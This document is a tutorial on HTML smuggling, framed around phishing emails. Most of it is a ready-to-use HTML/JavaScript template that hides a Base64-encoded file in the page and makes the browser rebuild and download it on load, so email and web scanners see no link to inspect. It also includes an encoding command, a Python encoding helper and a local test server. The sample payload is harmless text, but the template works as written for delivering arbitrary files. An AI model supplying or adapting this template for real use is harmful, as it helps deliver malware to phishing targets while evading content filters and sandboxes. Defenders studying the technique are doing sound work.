HTML smuggling is a technique that uses JavaScript to hide files from content filters. If you send a phishing email with a download link, the HTML typically contains an anchor tag whose href points directly at the file.
Email and web scanners can parse these links out and act on them: the link may be removed entirely, or the content behind the URL fetched and scanned in an AV sandbox. HTML smuggling gets around this by embedding the payload in the HTML source itself and using JavaScript to construct the download URL in the browser at runtime.
This is a simple boilerplate template based on work by Stan Hegt.
<html>
    <head>
        <title>HTML Smuggling</title>
    </head>
    <body>
        <p>This is all the user will see...</p>
        <script>
            // Decode a Base64 string into an ArrayBuffer of raw bytes.
            function convertFromBase64(base64) {
                var binary_string = window.atob(base64);
                var len = binary_string.length;
                var bytes = new Uint8Array(len);
                for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
                return bytes.buffer;
            }

            // Base64-encoded file content and the name it is saved under.
            var file = 'VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=';
            var data = convertFromBase64(file);
            var blob = new Blob([data], {type: 'octet/stream'});
            var fileName = 'test.txt';

            // Legacy Internet Explorer / Edge expose their own save API.
            if (window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob, fileName);
            else {
                // Other browsers: click a hidden anchor that points at a blob: URL.
                var a = document.createElement('a');
                document.body.appendChild(a);
                a.style = 'display: none';
                var url = window.URL.createObjectURL(blob);
                a.href = url;
                a.download = fileName;
                a.click();
                window.URL.revokeObjectURL(url);
            }
        </script>
    </body>
</html>
As this goes over the wire, a scanner will only see HTML and JavaScript. There are no hardcoded hyperlinks and the content type of the page itself is just text/html.
The encoded content in the file variable was created with:
ubuntu@DESKTOP-3BSK7NO ~> echo -en "This is a smuggled file" | base64
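For anyone without a shell to hand, the same encoding step can be sketched in Python. This is a minimal illustration rather than part of the original template: the helper name encode_payload is hypothetical, and it assumes the input has no trailing newline, which is what the -n flag to echo ensures in the command above.

```python
import base64


def encode_payload(data: bytes) -> str:
    """Return the Base64 text to paste into the template's `file` variable."""
    return base64.b64encode(data).decode("ascii")


# Same input as the echo command: no trailing newline.
encoded = encode_payload(b"This is a smuggled file")
print(encoded)  # VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=
```

The printed value matches the string assigned to the file variable in the template.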
When you visit this page, the browser will automatically reconstruct and download the file without any interaction from the user.
The Python HTTP server is a nice quick way to spin up a web server for testing.
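The quickest form is running python3 -m http.server 8000 from the directory that holds the page. The sketch below does the same thing programmatically, as a self-contained check that terminates on its own. It makes several assumptions for illustration: the make_server helper and the smuggle.html file name are hypothetical, the page body is a placeholder, and the server binds to 127.0.0.1 only. It serves the page from a temporary directory, fetches it once, and reports the status and content type the server returned.

```python
import functools
import http.server
import pathlib
import tempfile
import threading
import urllib.request


def make_server(directory, port=0):
    """Build a local-only HTTP server for `directory`; port 0 picks a free port."""
    handler = functools.partial(
        http.server.SimpleHTTPRequestHandler, directory=str(directory)
    )
    return http.server.ThreadingHTTPServer(("127.0.0.1", port), handler)


# Serve a placeholder page from a temporary directory and fetch it once.
with tempfile.TemporaryDirectory() as tmp:
    page = pathlib.Path(tmp) / "smuggle.html"  # hypothetical file name
    page.write_text("<html><body><p>placeholder</p></body></html>")

    server = make_server(tmp)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()

    # Bypass any proxy configured in the environment for this local request.
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    try:
        with opener.open(f"http://127.0.0.1:{port}/smuggle.html") as resp:
            status = resp.status
            content_type = resp.headers.get_content_type()
    finally:
        server.shutdown()
        server.server_close()

print(status, content_type)
```

For an interactive session, calling make_server(".", 8000).serve_forever() keeps the server running until it is interrupted.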